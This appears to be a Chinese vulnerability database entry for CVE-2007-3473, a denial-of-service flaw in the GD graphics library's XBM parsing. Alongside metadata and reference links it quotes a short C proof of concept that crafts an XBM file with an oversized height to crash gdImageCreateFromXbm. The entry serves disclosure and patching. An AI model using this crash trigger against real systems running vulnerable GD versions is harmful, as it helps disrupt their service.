Gg图形库 dImageCreateXbm函数拒绝服务攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1113202 漏洞类型
发布时间 2007-06-26 更新时间 2007-10-05
CVE编号 CVE-2007-3473 CNNVD-ID CNNVD-200706-510
漏洞平台 Linux CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/30251
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200706-510
|漏洞详情
GD是一个开源的代码库,用于为站点动态创建图形。GD图形库的gdImageCreateXbm函数存在拒绝服务攻击漏洞,远程用户辅助攻击者可以通过未明向量包括gdImageCreateXbm的故障引起程序崩溃导致拒绝服务。
|漏洞EXP
source: http://www.securityfocus.com/bid/24651/info

The GD graphics library is prone to multiple vulnerabilities.

An attacker can exploit this issue to cause denial-of-service conditions or execute arbitrary code in the context of applications implementing the affected library.

Version prior to GD graphics library 2.0.35 are reported vulnerable. 

#include "gd.h"

int main() {
    FILE *fp = fopen("./x.xbm", "w+");

    fprintf(fp, "#define width 255\n#define height 1073741824\nstatic unsigned char bla = {\n");

    fseek(fp, 0, SEEK_SET);

    gdImageCreateFromXbm(fp);

}
|参考资料

来源:www.libgd.org
链接:http://www.libgd.org/ReleaseNote020035
来源:VUPEN
名称:ADV-2007-2336
链接:http://www.frsirt.com/english/advisories/2007/2336
来源:SECUNIA
名称:25855
链接:http://secunia.com/advisories/25855
来源:MISC
链接:http://bugs.libgd.org/?do=details&task_id=94
来源:v
链接:https://issues.rpath.com/browse/RPL-1643
来源:bugzilla.redhat.com
链接:https://bugzilla.redhat.com/show_bug.cgi?id=277421
来源:XF
名称:gd-imagecreatexbm-dos(35109)
链接:http://xforce.iss.net/xforce/xfdb/35109
来源:TRUSTIX
名称:2007-0024
链接:http://www.trustix.org/errata/2007/0024/
来源:BID
名称:24651
链接:http://www.securityfocus.com/bid/24651
来源:BUGTRAQ
名称:20070907FLEA-2007-0052-1gd
链接:http://www.securityfocus.com/archive/1/archive/1/478796/100/0/threaded
来源:REDHAT
名称:RHSA-2008:0146
链接:http://www.redhat.com/support/errata/RHSA-2008-0146.html
来源:FEDORA
名称:FEDORA-2007-692
链接:http://www.redhat.com/archives/fedora-package-announce/2007-September/msg00311.html
来源:MANDRIVA
名称:MDKSA-2007:164
链接:http://www.mandriva.com/security/advisories?name=MDKSA-2007: